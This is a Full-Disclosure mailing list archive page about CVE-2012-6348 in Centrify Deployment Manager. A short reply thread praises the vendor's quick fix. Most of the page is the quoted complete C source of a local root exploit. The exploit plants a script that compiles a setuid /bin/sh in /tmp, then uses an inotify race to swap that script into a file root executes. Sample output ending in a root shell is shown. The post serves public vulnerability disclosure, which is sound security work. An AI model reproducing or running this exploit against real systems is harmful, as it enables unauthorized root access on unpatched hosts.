[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Local root exploit for Centrify Deployment Manager < v2.1.0.283 local root



<html><body><div>These guys were really cool about it, probably one of the best 
vendor responses I've gotten.&nbsp; I am seeing if<br>I can go to the next 
iteration of training. =-&gt;&nbsp; <br></div><div><br>On Dec 18, 2012, at 
12:51 PM, Jeffrey Walton &lt;noloader@xxxxxxxxx&gt; 
wrote:<br><br><div><blockquote type="cite"><div class="msg-quote"><div 
class="_stretch">I've got a feeling you will not be sent to anymore vendor 
classes :)<br> <br> On Tue, Dec 18, 2012 at 3:49 PM, Larry W. Cashdollar &lt;<a 
href="mailto:larry0@xxxxxx"; 
data-mce-href="mailto:larry0@xxxxxx";>larry0@xxxxxx</a>&gt; wrote:<br> &gt; 
/*Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,<br> 
&gt; Centrify released a fix very quickly - nice vendor response.<br> &gt;<br> 
&gt; <a href="http://vapid.dhs.org/exploits/centrify_local_r00t.c"; 
data-mce-href="http://vapid.dhs.org/exploits/centrify_local_r00t.c";>http://vapid.dhs.org/exploits/centrify_local_r00t.c</a><br>
 &gt;<br> &gt; CVE-2012-6348 12/17/2012<br> &gt; <a 
href="http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html";
 
data-mce-href="http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html";>http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html</a><br>
 &gt; Greetings vladz, Thanks for the inotify &amp; syscall technique.<br> 
&gt;<br> &gt; This exploit based on <a 
href="http://vladz.devzero.fr/010_bzexe-vuln.php"; 
data-mce-href="http://vladz.devzero.fr/010_bzexe-vuln.php";>http://vladz.devzero.fr/010_bzexe-vuln.php</a><br>
 &gt;<br> &gt; Run the exploit and wait for administrator to analyse or 
deploysoftware<br> &gt; to the system.<br> &gt;<br> &gt; 
larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0<br> &gt; [*] Launching 
attack against "centrify.cmd.0"<br> &gt; [+] Creating evil script 
(/tmp/evil)<br> &gt; [+] Creating target file (/bin/touch 
/tmp/centrify.cmd.0)<br> &gt; [+] Initialize inotify<br> &gt; [+] Waiting for 
root to launch "centrify.cmd.0"<br> &gt; [+] Opening root shell (/tmp/sh)<br> 
&gt; #<br> &gt;<br> &gt; Larry W. Cashdollar<br> &gt; @_larry0<br> &gt; */<br> 
&gt;<br> &gt;<br> &gt; #include &lt;stdlib.h&gt;<br> &gt; #include 
&lt;stdio.h&gt;<br> &gt; #include &lt;unistd.h&gt;<br> &gt; #include 
&lt;sys/stat.h&gt;<br> &gt; #include &lt;sys/types.h&gt;<br> &gt; #include 
&lt;string.h&gt;<br> &gt; #include &lt;sys/inotify.h&gt;<br> &gt; #include 
&lt;fcntl.h&gt;<br> &gt; #include &lt;sys/syscall.h&gt;<br> &gt;<br> &gt; 
/*Create a small c program to pop us a root shell*/<br> &gt; int 
create_nasty_shell(char *file) {<br> &gt; char *s = "#!/bin/bash\n"<br> &gt; 
"echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'&gt;/tmp/sh.c\n"<br> &gt; "cc 
/tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"<br> &gt; "chmod 4755 
/tmp/sh;\n";<br> &gt;<br> &gt; int fd = open(file, O_CREAT|O_RDWR, 
S_IRWXU|S_IRWXG|S_IRWXO);<br> &gt; write(fd, s, strlen(s));<br> &gt; 
close(fd);<br> &gt;<br> &gt; return 0;<br> &gt; }<br> &gt;<br> &gt;<br> &gt; 
int main(int argc, char **argv) {<br> &gt; int fd, wd;<br> &gt; char buf[1], 
*targetpath, *cmd,<br> &gt; *evilsh = "/tmp/evil", *trash = "/tmp/trash";<br> 
&gt;<br> &gt; if (argc &lt; 2) {<br> &gt; printf("Usage: %s &lt;target file&gt; 
\n", argv[0]);<br> &gt; return 1;<br> &gt; }<br> &gt;<br> &gt; printf("[*] 
Launching attack against \"%s\"\n", argv[1]);<br> &gt;<br> &gt; printf("[+] 
Creating evil script (/tmp/evil)\n");<br> &gt; create_nasty_shell(evilsh);<br> 
&gt;<br> &gt; targetpath = malloc(sizeof(argv[1]) + 6);<br> &gt; cmd = 
malloc(sizeof(char) * 32);<br> &gt; sprintf(targetpath, "/tmp/%s", 
argv[1]);<br> &gt; sprintf(cmd,"/bin/touch %s",targetpath);<br> &gt; 
printf("[+] Creating target file (%s)\n",cmd);<br> &gt; system(cmd);<br> 
&gt;<br> &gt; printf("[+] Initialize inotify\n");<br> &gt; fd = 
inotify_init();<br> &gt; wd = inotify_add_watch(fd, targetpath, IN_ATTRIB);<br> 
&gt;<br> &gt; printf("[+] Waiting for root to change perms on \"%s\"\n", 
argv[1]);<br> &gt; syscall(SYS_read, fd, buf, 1);<br> &gt; syscall(SYS_rename, 
targetpath, trash);<br> &gt; syscall(SYS_rename, evilsh, targetpath);<br> 
&gt;<br> &gt; inotify_rm_watch(fd, wd);<br> &gt;<br> &gt; printf("[+] Opening 
root shell (/tmp/sh)\n");<br> &gt; sleep(2);<br> &gt; system("rm -fr 
/tmp/trash;/tmp/sh || echo \"[-] Failed.\"");<br> &gt;<br> &gt; return 0;<br> 
&gt; }<br></div></div></blockquote></div></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/